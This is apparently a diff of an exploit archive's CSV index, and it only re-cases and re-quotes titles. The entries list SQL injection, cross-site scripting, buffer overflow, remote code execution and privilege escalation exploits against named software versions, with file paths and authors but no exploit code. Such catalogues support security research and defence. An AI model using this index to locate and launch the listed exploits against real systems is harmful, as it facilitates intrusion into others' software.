Links Module - link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26390,platforms/php/webapps/26390.txt,"saPHP Lesson - add.php forumid Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26391,platforms/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",php,webapps,0 -26392,platforms/php/webapps/26392.txt,"PHPMyAdmin 2.x - queryframe.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 -26393,platforms/php/webapps/26393.txt,"PHPMyAdmin 2.x - server_databases.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 +26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - queryframe.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 +26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 26394,platforms/php/webapps/26394.txt,"MWChat 6.8 - chat.php SQL Injection",2005-05-21,rgod,php,webapps,0 26395,platforms/php/webapps/26395.txt,"Basic Analysis And Security Engine 1.2 - Base_qry_main.php SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 - usercp.php SQL Injection",2005-10-26,Animal,php,webapps,0 @@ -23526,21 +23527,21 @@ id,file,description,date,author,platform,type,port 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 -26404,platforms/windows/local/26404.py,"MediaCoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - (play.php gid parameter) SQL Injection",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 +26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - (play.php gid Parameter) SQL Injection",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault OSSIM Open Source SIEM 4.1 - Multiple SQL Vulnerabilities",2013-06-24,"Glafkos Charalambous ",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0 -26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - (manageuser.php task parameter) SQL Injection",2013-06-24,drone,php,webapps,0 +26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection",2013-06-24,drone,php,webapps,0 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0 26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id Parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation",2013-06-24,Metasploit,windows,local,0 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 @@ -23568,8 +23569,8 @@ id,file,description,date,author,platform,type,port 26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - forum.php Multiple SQL Injection",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 26443,platforms/php/remote/26443.php,"PHP 4.x/5.0.x - File Upload GLOBAL Variable Overwrite",2005-10-31,rgod,php,remote,0 -26444,platforms/asp/webapps/26444.txt,"Comersus BackOffice 4.x/5.0/6.0 - comersus_backoffice_supportError.asp error Parameter Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 -26445,platforms/asp/webapps/26445.pl,"Comersus BackOffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 +26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - comersus_Backoffice_supportError.asp error Parameter Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 +26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 @@ -23577,11 +23578,11 @@ id,file,description,date,author,platform,type,port 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation",2013-06-26,Metasploit,win_x86,local,0 -26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 -26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 +26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 -26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0 +26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 26459,platforms/php/webapps/26459.txt,"PHPWebThings 0.4.4 - forum.php Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps,0 26460,platforms/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow",2005-11-02,"Luigi Auriemma",windows,remote,0 @@ -23603,7 +23604,7 @@ id,file,description,date,author,platform,type,port 26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0 -26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 +26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 @@ -23611,7 +23612,7 @@ id,file,description,date,author,platform,type,port 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 -26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 +26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",linux,dos,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - Tiki-view_forum_thread.php Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting",2005-11-09,"Moritz Naumann",windows,remote,0 @@ -23620,7 +23621,7 @@ id,file,description,date,author,platform,type,port 26494,platforms/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0 26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 -26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - .RM File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote,0 +26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - download.php File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 @@ -23638,7 +23639,7 @@ id,file,description,date,author,platform,type,port 26512,platforms/php/webapps/26512.txt,"PHPwcms 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"PHPwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 +26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft PowerPoint 2007 - Crash (PoC)",2013-07-01,Asesino04,windows,dos,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 @@ -23649,21 +23650,21 @@ id,file,description,date,author,platform,type,port 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' SEH Buffer Overflow",2013-07-01,MrXors,windows,local,0 -26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - (.png) Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0 +26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0 26529,platforms/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method",2013-07-01,Metasploit,multiple,remote,0 -26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'unserialize()' Function Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 +26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Function Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 26531,platforms/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote,0 26532,platforms/jsp/webapps/26532.txt,"Revize CMS - Query_results.jsp SQL Injection",2005-11-17,Lostmon,jsp,webapps,0 26533,platforms/jsp/webapps/26533.txt,"Revize CMS - Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0 -26535,platforms/php/webapps/26535.txt,"LiteSpeed 2.1.5 - ConfMgr.php Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0 +26535,platforms/php/webapps/26535.txt,"Litespeed 2.1.5 - ConfMgr.php Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0 26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - Shopadmin.asp HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - options.php / viewforum.php SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 -26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - .SVG Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 +26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 26541,platforms/php/webapps/26541.txt,"SimplePoll - results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 @@ -23677,7 +23678,7 @@ id,file,description,date,author,platform,type,port 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - index.pl Multiple Parameter Cross-Site Scripting",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 -26554,platforms/windows/local/26554.rb,"Windows - EPATHOBJ::pprFlattenRec Privilege Escalation",2013-07-02,Metasploit,windows,local,0 +26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation",2013-07-02,Metasploit,windows,local,0 26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 - customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 @@ -23778,11 +23779,11 @@ id,file,description,date,author,platform,type,port 26653,platforms/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - search.php SQL Injection",2005-11-29,r0t,php,webapps,0 26654,platforms/php/webapps/26654.txt,"KBase Express 1.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26655,platforms/php/webapps/26655.txt,"ltwCalendar 4.1.3 - calendar.php SQL Injection",2005-11-29,r0t,php,webapps,0 -26656,platforms/php/webapps/26656.txt,"Orca Knowledgebase 2.1 - knowledgebase.php SQL Injection",2005-11-29,r0t,php,webapps,0 +26656,platforms/php/webapps/26656.txt,"Orca KnowledgeBase 2.1 - 'KnowledgeBase.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 - blog.php SQL Injection",2005-11-29,r0t,php,webapps,0 26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 - Ringmaker.php SQL Injection",2005-11-29,r0t,php,webapps,0 26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 - viewFAQ.php Multiple Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 -26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php' CATEGORY_ID Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 +26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php' category_id Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 26661,platforms/php/webapps/26661.txt,"Survey System 1.1 - survey.php SQL Injection",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,php,webapps,0 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 @@ -23829,7 +23830,7 @@ id,file,description,date,author,platform,type,port 26704,platforms/asp/webapps/26704.txt,"Solupress News 1.0 - search.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 - Archive.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - messages.php SQL Injection",2005-12-03,"Nolan West",php,webapps,0 -26707,platforms/php/webapps/26707.txt,"Alisveristr E-commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0 +26707,platforms/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0 26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 - ERS File Handling Buffer Overflow",2013-07-09,Metasploit,windows,local,0 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Privilege Escalation",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 @@ -23857,13 +23858,13 @@ id,file,description,date,author,platform,type,port 26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 26735,platforms/php/webapps/26735.txt,"vBulletin vBShout Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 -26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0 +26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 27634,platforms/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,php,webapps,0 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0 -26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - password.asp Cross-Site Scripting",2005-12-06,Dj_Eyes,asp,webapps,0 +26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - Password.asp Cross-Site Scripting",2005-12-06,Dj_Eyes,asp,webapps,0 26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - KB.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 -26744,platforms/asp/webapps/26744.txt,"NetauctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps,0 +26744,platforms/asp/webapps/26744.txt,"NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps,0 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - search.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 @@ -23897,7 +23898,7 @@ id,file,description,date,author,platform,type,port 26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.exe Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.asp Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 -26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 +26778,platforms/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 26779,platforms/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,windows,dos,0 26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - SPT-QuickSearch.php Multiple Parameter Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - SPT-BrowseResources.php ParentId Parameter Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 @@ -23907,7 +23908,7 @@ id,file,description,date,author,platform,type,port 26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - Link.php SQL Injection",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 -26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - includes/db.php $_CCFG[_PKG_PATH_DBSE] Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 +26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 @@ -23923,7 +23924,7 @@ id,file,description,date,author,platform,type,port 26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - search.php keyword Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -26804,platforms/php/webapps/26804.txt,"Wordpress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 +26804,platforms/php/webapps/26804.txt,"WordPress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow",2013-07-13,Metasploit,windows,local,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 @@ -23953,7 +23954,7 @@ id,file,description,date,author,platform,type,port 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php' _SERVER[REMOTE_ADDR] Parameter Cross-Site Scripting",2005-12-14,rgod,php,webapps,0 26837,platforms/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - index2.php option Parameter Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps,0 -26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-commerce - 'index.php' page Parameter Cross-Site Scripting",2005-12-15,B3g0k,php,webapps,0 +26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php' page Parameter Cross-Site Scripting",2005-12-15,B3g0k,php,webapps,0 